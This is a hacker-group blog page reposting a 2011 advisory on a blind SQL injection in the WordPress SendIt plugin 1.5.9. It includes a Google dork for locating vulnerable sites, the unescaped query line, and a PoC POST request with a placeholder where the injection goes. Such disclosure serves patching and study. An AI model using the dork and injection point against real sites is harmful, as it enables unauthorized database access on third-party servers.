CMD666
JatimCrew
today : | at : | safemode : ON
> Thanks To | G3MB3LZ | Karna Radhey | 3vil666 | ZuanBinjai | Chliz Aceh | Jundab | Pretty | Bhandell | Jufry-Gaptek | ArrayXc | 4j4l13 | Ares | Freesider | Xcrew | IndoBackTrack | IndoBlackHat | JatimCrew | KidzCyber Team's | And You
name author perms com modified label

WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability Mysterykid rwxr-xr-x 0 04.19

Filename WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability
Permission rw-r--r--
Author Mysterykid
Date and Time 04.19
Label
Action
Exploit Title: WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability

# Google Dork: inurl:"wp-content/plugins/sendit/submit.php"

# Date: 2011-08-25

# Author: evilsocket ( evilsocket [at] gmail [dot] com )

# Software Link: http://wordpress.org/extend/plugins/sendit/

# Version: 1.5.9 (tested with magic quotes OFF)


---------------
Vulnerable code
---------------

[ submit.php line 27 ]

$user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST[lista]';");


As you can see, $_POST[lista] parameter is nor validated neither escaped, so you can blind sql inject it using $user_count for the
boolean condition checking :


[ submit.php line 29 ]

if($user_count>0) :
$errore_presente = "<div class=\"error\">".__('email address already present', 'sendit')."</div>";
die($errore_presente);

---
[-] PoC
---

[-] POST:

email_add = some.random.regexp.valid.email@domain.ltd
lista = BLIND SQL INJECTION HERE

TO:

http://www.site.com/wp-content/plugins/s...submit.php

0 komentar:

Posting Komentar

 

Jayalah Indonesiaku © 2013 CMD-666
un-Name Template design by CMD-666